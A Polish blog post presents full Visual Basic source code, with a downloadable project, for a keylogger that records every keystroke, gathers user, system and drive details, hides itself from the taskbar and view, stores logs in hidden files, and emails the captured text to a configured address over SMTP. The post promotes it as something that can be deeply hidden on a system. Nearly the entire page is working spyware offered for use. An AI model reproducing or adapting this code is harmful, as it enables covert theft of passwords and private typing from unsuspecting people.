«

»

Lis 03

Wydrukuj to Wpis

Visual Basic-Keylogger + e-mail

Visual C# Keylogger

Keylogger + e-mail – zapisuje każdy wciśnięty klawisz. Potrafi wysłać dane na e-mail. Zapisuje datę oraz godzinę, o której wpisywany był tekst. Keylogger + e-mail może zostać głęboko ukryty w systemie (niewidoczny na pasku zadań).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
Imports System.Net.Mail
Imports System.IO
Imports Microsoft.Win32
Public Class Form1
  Dim i As Integer = 0
  Dim result As Integer
  Dim Dyski(5) As String
  Private Obserwator As New System.IO.FileSystemWatcher
  Private Declare Function GetAsyncKeyState Lib "USER32" (ByVal vKey As Integer) As Integer
  Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Integer) As Integer
 
  Public Function GetCapslock() As Boolean
    GetCapslock = CBool(GetKeyState(&H14))
  End Function
 
  Public Function GetShift() As Boolean
    GetShift = CBool(GetAsyncKeyState(&H10))
  End Function
 
  Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
    TextBox1.ReadOnly = True : MyBase.Text = "KeyLogger"
    INFORMACJA_O_KOMPUTERZE()
  End Sub
 
  Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    KeyLoggerEN()
    'zrobić program widocznym
    If TextBox1.Text.EndsWith(TBHasłoKeylogger.Text) = True Then
      TextBox1.Text = TextBox1.Text.Substring(0, TextBox1.TextLength - TBHasłoKeylogger.TextLength)
      UKRYĆ_KEYLOGGER(True, 100, False)
    End If
 
    If TextBox1.TextLength >= CInt(TBLitery.Text) Then
      WYSLAĆ_NA_EMAIL(TextBox1.Text)
    End If
 
  End Sub
 
  Sub KeyLoggerEN()
    For i As Integer = 1 To 225
      result = 0
      result = GetAsyncKeyState(i)
      If result = -32767 Then
        Select Case i
          'Literki
          Case 64 To 90
            If GetShift() = True Or GetCapslock() = True Then
              TextBox1.Text &= Chr(i).ToString.ToUpper
            Else
              TextBox1.Text &= Chr(i).ToString.ToLower
            End If
            'Cyfry
          Case 48 To 57
            If GetShift() = True Then
              Select Case i
                Case 48 : TextBox1.Text &= ")" : Case 49 : TextBox1.Text &= "!"
                Case 50 : TextBox1.Text &= "@" : Case 51 : TextBox1.Text &= "#"
                Case 52 : TextBox1.Text &= "$" : Case 53 : TextBox1.Text &= "%"
                Case 54 : TextBox1.Text &= "^" : Case 55 : TextBox1.Text &= "&"
                Case 56 : TextBox1.Text &= "*" : Case 57 : TextBox1.Text &= "("
              End Select
            Else
              TextBox1.Text &= Chr(i)
            End If
          Case 96 : TextBox1.Text &= "0"
          Case 97 : TextBox1.Text &= "1" : Case 98 : TextBox1.Text &= "2"
          Case 99 : TextBox1.Text &= "3" : Case 100 : TextBox1.Text &= "4"
          Case 101 : TextBox1.Text &= "5" : Case 102 : TextBox1.Text &= "6"
          Case 103 : TextBox1.Text &= "7" : Case 104 : TextBox1.Text &= "8"
          Case 105 : TextBox1.Text &= "9" : Case 106 : TextBox1.Text &= "*"
          Case 107 : TextBox1.Text &= "+" : Case 109 : TextBox1.Text &= "-"
          Case 110 : TextBox1.Text &= "." : Case 111 : TextBox1.Text &= "/"
            'Synbol
          Case 186 To 192
            If GetShift() = True Then
              Select Case i
                Case 186 : TextBox1.Text &= ":" : Case 187 : TextBox1.Text &= "+"
                Case 188 : TextBox1.Text &= "<" : Case 189 : TextBox1.Text &= "_"
                Case 190 : TextBox1.Text &= ">" : Case 191 : TextBox1.Text &= "?"
                Case 192 : TextBox1.Text &= "~"
              End Select
            Else
              Select Case i
                Case 186 : TextBox1.Text &= ";" : Case 187 : TextBox1.Text &= "="
                Case 188 : TextBox1.Text &= "," : Case 189 : TextBox1.Text &= "-"
                Case 190 : TextBox1.Text &= "." : Case 191 : TextBox1.Text &= "/"
                Case 192 : TextBox1.Text &= "`"
              End Select
            End If
          Case 219 To 222
            If GetShift() = True Then
              Select Case i
                Case 219 : TextBox1.Text &= "{" : Case 220 : TextBox1.Text &= "|"
                Case 221 : TextBox1.Text &= "}" : Case 222 : TextBox1.Text &= """"
              End Select
            Else
              Select Case i
                Case 219 : TextBox1.Text &= "[" : Case 220 : TextBox1.Text &= "\"
                Case 221 : TextBox1.Text &= "]" : Case 222 : TextBox1.Text &= "'"
              End Select
            End If
 
          Case 8
            If TextBox1.TextLength > 0 Then
              TextBox1.Text = TextBox1.Text.Substring(0, TextBox1.TextLength - 1)
            End If
          Case 46 : TextBox1.Text &= " [Del] "
          Case 17 : TextBox1.Text &= " [Ctrl] " : Case 18 : TextBox1.Text &= " [Alt] "
          Case 13 : TextBox1.Text &= " [Enter] " + vbNewLine : Case 9 : TextBox1.Text &= " [Tab] "
          Case 32 : TextBox1.Text &= " "
          Case 1 : Case 2 'Mouse
          Case 27 'Esc
          Case 91 'Windows key 
          Case 144 : Case 45 : Case 12
          Case 37 To 40 : Case 33 To 36
          Case 16 : Case 160 To 165 : Case 20
          Case Else : TextBox1.Text &= " Ascii(" & i & ") "
        End Select
      End If
    Next i
  End Sub
 
  Sub INFORMACJA_O_KOMPUTERZE()
    Try
      TextBox1.Text = "URUCHOMIENIE PROGRAMU: " & Now & vbCrLf & _
        "WERSJA SYSTEMU OPERACYJNEGO: " & My.Computer.Info.OSFullName & vbCrLf & _
        "NAZWA UŻYTKOWNIKA: " & My.User.Name & vbCrLf & _
        "AKTYWNY JĘZYK WPROWADZANIA: " & System.Windows.Forms.InputLanguage.CurrentInputLanguage.Culture.NativeName & vbCrLf & _
        "ZAINSTALOWANE JĘZYKI:"
      For Each IL As System.Windows.Forms.InputLanguage In System.Windows.Forms.InputLanguage.InstalledInputLanguages
        TextBox1.Text &= vbCrLf & IL.Culture.NativeName
      Next
      TextBox1.Text &= vbCrLf & "DYSK LOKALNY: " & vbCrLf
      For Each Dysk As IO.DriveInfo In IO.DriveInfo.GetDrives
        If Dysk.DriveType = IO.DriveType.Fixed AndAlso Dysk.IsReady AndAlso Dysk.VolumeLabel <> "" Then
          TextBox1.Text &= Dysk.ToString & " = " & My.Computer.FileSystem.GetDriveInfo(Dysk.ToString).TotalSize & " bajtów" & vbCrLf & "ZAWARTOŚĆ DYSKU " & Dysk.ToString & vbCrLf
          'folder
          Dim Foldery() As String = Directory.GetDirectories(Dysk.ToString)
          Dim Folder As String
          For Each Folder In Foldery
            TextBox1.Text &= Folder & vbCrLf
          Next
          'plik
          Dim Pliki() As String = Directory.GetFiles(Dysk.ToString)
          Dim Plik As String
          For Each Plik In Pliki
            TextBox1.Text &= Plik & vbCrLf
          Next
          If Dyski(i) = Nothing And i <= 5 Then
            Dyski(i) = Dysk.ToString
            USTAWIENIE()
            i = +1
          End If
        End If
      Next
    Catch ex As Exception
      WYSLAĆ_NA_EMAIL(ex.ToString)
    End Try
  End Sub
 
  Sub WYSLAĆ_NA_EMAIL(ByVal Body As String)
    Try
      Dim MyMailMassege As New MailMessage()
      MyMailMassege.From = New MailAddress("my@mail.com")
      MyMailMassege.To.Add(TBDo.Text)
      MyMailMassege.Subject = (My.User.Name)
      MyMailMassege.Body = (Body)
      Dim SMTPServer As New SmtpClient("smtp.mymail.com")
      SMTPServer.Port = 587 'Port
      SMTPServer.Credentials = New System.Net.NetworkCredential("login", "hasło")
      SMTPServer.EnableSsl = True
      SMTPServer.Send(MyMailMassege)
      TextBox1.Clear()
      If Timer1.Enabled = False Then MsgBox("Wiadomość została wysłana")
    Catch ex As Exception
      If Me.Visible = True Then
        MsgBox(ex.Message.ToString)
      Else
        ZACHOWAĆ_TEKST(TextBox1.Text)
      End If
    End Try
  End Sub
 
  Sub ZACHOWAĆ_TEKST(ByVal Text As String)
    Try
      If File.Exists(Dyski(0) + "KeyLogger") = False Then Directory.CreateDirectory(Dyski(0) + "KeyLogger")
      Dim TextFile As New StreamWriter(Dyski(0) + "KeyLogger\textkl", True)
      TextFile.WriteLine(Text)
      TextFile.Close()
      File.SetAttributes(Dyski(0) + "KeyLogger", FileAttributes.Hidden)
      File.SetAttributes(Dyski(0) + "KeyLogger\textkl", FileAttributes.Hidden)
    Catch ex As Exception
      ZACHOWAĆ_TEKST(ex.ToString)
    End Try
  End Sub
 
  Sub UKRYĆ_KEYLOGGER(ByVal Ukryć As Boolean, ByVal Widoczność As Integer, ByVal Timer As Boolean)
    ShowIcon = Ukryć
    ShowInTaskbar = Ukryć
    Me.Visible = Ukryć
    Me.Opacity = Widoczność
    Timer1.Enabled = Timer
  End Sub
 
  Private Sub Wysłać_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    If TBDo.Text = "" Or TBDo.Text = "my@mail.com" Then MsgBox("Wprowadź swój adres e-mail", MsgBoxStyle.Information) : TBDo.Focus() : Exit Sub
    WYSLAĆ_NA_EMAIL(TextBox1.Text)
  End Sub
 
  Private Sub TBLitery_KeyPress(ByVal sender As Object, ByVal e As System.Windows.Forms.KeyPressEventArgs) Handles TBLitery.KeyPress
    If Char.IsDigit(e.KeyChar) = False Then e.Handled = True
    If Char.IsDigit(e.KeyChar) = True Then e.Handled = False
    If e.KeyChar = ChrW(Keys.Back) Then e.Handled = False
  End Sub
 
  Private Sub Zapisz_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
    If TBDo.Text = "" Or TBDo.Text = "my@mail.com" Then MsgBox("Wprowadź swój adres e-mail", MsgBoxStyle.Information) : TBDo.Focus() : Exit Sub
    If TBHasłoKeylogger.Text = "" Then MsgBox("Wprowadź hasło Keyloggera", MsgBoxStyle.Information) : TBHasłoKeylogger.Focus() : Exit Sub
    If TBLitery.Text = "" Then TBLitery.Text = 100
    Try
      If File.Exists(Dyski(0) + "KeyLogger\settingkl") = True Then File.Delete(Dyski(0) + "KeyLogger\settingkl")
      If File.Exists(Dyski(0) + "KeyLogger") = False Then Directory.CreateDirectory(Dyski(0) + "KeyLogger")
      Dim Setting As New StreamWriter(Dyski(0) + "KeyLogger\settingkl")
      Setting.WriteLine(TBDo.Text)
      Setting.WriteLine(TBHasłoKeylogger.Text)
      Setting.WriteLine(TBLitery.Text)
      Setting.Close()
      File.SetAttributes(Dyski(0) + "KeyLogger", FileAttributes.Hidden)
      File.SetAttributes(Dyski(0) + "KeyLogger\settingkl", FileAttributes.Hidden)
      USTAWIENIE()
    Catch ex As Exception
      If Me.Visible = True Then
        MsgBox(ex.ToString)
      Else
        WYSLAĆ_NA_EMAIL(ex.ToString)
      End If
    End Try
  End Sub
 
  Sub USTAWIENIE()
    If File.Exists(Dyski(0) + "KeyLogger\settingkl") = True Then
      UKRYĆ_KEYLOGGER(False, 0, True)
      Dim Setting As New StreamReader(Dyski(0) + "KeyLogger\settingkl")
      TBDo.Text = Setting.ReadLine
      TBHasłoKeylogger.Text = Setting.ReadLine
      TBLitery.Text = Setting.ReadLine
      Setting.Close()
    Else
      UKRYĆ_KEYLOGGER(True, 100, False)
    End If
  End Sub
End Class

Załączniki do pobrania

 • rar KeyLogger
  Visual Basic Project
  Rozmiar pliku: 83 KB Pobrania: 171

Permalink do tego artykułu: http://tmall.com.pl/visual-basic-keylogger-e-mail/

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

Możesz użyć tych znaczników i atrybutów HTMLa: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>